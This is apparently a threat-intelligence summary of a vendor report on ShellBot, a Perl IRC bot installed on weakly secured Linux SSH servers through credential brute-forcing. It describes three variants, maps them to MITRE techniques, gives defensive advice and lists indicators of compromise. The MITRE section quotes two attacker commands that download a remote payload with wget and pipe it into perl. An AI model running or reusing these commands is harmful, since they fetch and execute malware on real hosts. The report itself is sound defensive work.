ShellBot is being distributed to poorly managed Linux SSH servers, leveraging SSH credential brute-forcing and IRC-based C2 channels to control infected hosts. The report details three ShellBot variants (LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots), how attackers operate, and recommended defenses. Hashtags: #ShellBot #PerlBot #LiGhTsModdedperlbotV2 #DDoSPBotv2 #PowerBots #GohacK #LinuxSSH
Keypoints
- ShellBot (Perl-based) malware is being installed on poorly managed Linux SSH servers and uses IRC to communicate with the C2 server.
- Threat actors gain access by scanning for SSH with port 22 and attempting dictionary attacks using common credentials.
- There are multiple ShellBot variants, notably LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots, each offering different command sets for DDoS and backdoor actions.
- LiGhT’s Modded perlbot v2 includes multiple installation commands, C2 URLs, IRC channels, and DDoS/backdoor capabilities.
- DDoS PBot v2.0 features IRC-based control with admin verification for channel commands and a mix of system info, DDoS, and utility commands.
- PowerBots present a simpler backdoor focus with reverse shell and file download capabilities, plus basic DDoS-related commands and a dedicated C2 channel.
- Defensive guidance emphasizes strong passwords, patching, firewall protection, and keeping malware-detection tools updated; IOC details are provided (MD5s, download URLs, and C2 URLs).
MITRE Techniques
- [T1110] Brute Force – The attackers “search for systems where the SSH service is active and uses a list of commonly used SSH account credentials to initiate their dictionary attack.” – “After scanning systems that have operational port 22s, threat actors search for systems where the SSH service is active and uses a list of commonly used SSH account credentials to initiate their dictionary attack.”
- [T1046] Network Service Scanning – The actors perform scanning to identify systems with SSH open, i.e., “After scanning systems that have operational port 22s…”
- [T1071] Application Layer Protocol – ShellBot uses “an IRC protocol to communicate with C&C servers” and transmits/stores data via IRC channels. – “The ShellBot malware strains… uses an IRC protocol to communicate with C&C servers.”
- [T1059.004] Unix Shell – Installation and operation rely on shell commands such as wget and perl to fetch and execute payloads. – “wget -qO – x-x-x[.]online/ak|perl”
- [T1105] Ingress Tool Transfer – The malware downloads payloads from remote servers (e.g., wget commands fetching Perl payloads). – “wget -qO – 80.94.92[.]241/bash|perl”
- [T1070] Indicator Removal on Host – DDoS PBot v2.0 and related variants include log-related commands such as LogCleaner, indicating attempts to hide activity. – “LogCleaner”
Indicators of Compromise
- [MD5] – ShellBot sample hashes identified in the article – bef1a9a49e201095da0bb26642f65a78, 3eef28005943fee77f48ac6ba633740d, and 6 more hashes
- [Download URL] – Malware payload URLs – x-x-x[.]online/ak, 193.233.202[.]219/mperl, and 5 more URLs
- [C2 URL] – Command-and-control endpoints – 164.90.240[.]68:6667, 206.189.139[.]152:6667, and 3 more
- [Filename] – Installed/used filenames – ak, per, mperl, niko1, bash, test.jpg, dred, ff (examples shown; 2 more filenames listed in article)
- [Domain] – Domains referenced for C2 or download hosts – gsm.ftp[.]sh, and 1 more domain (in the article)
Read more: https://asec.ahnlab.com/en/49769/comment-page-2/#comments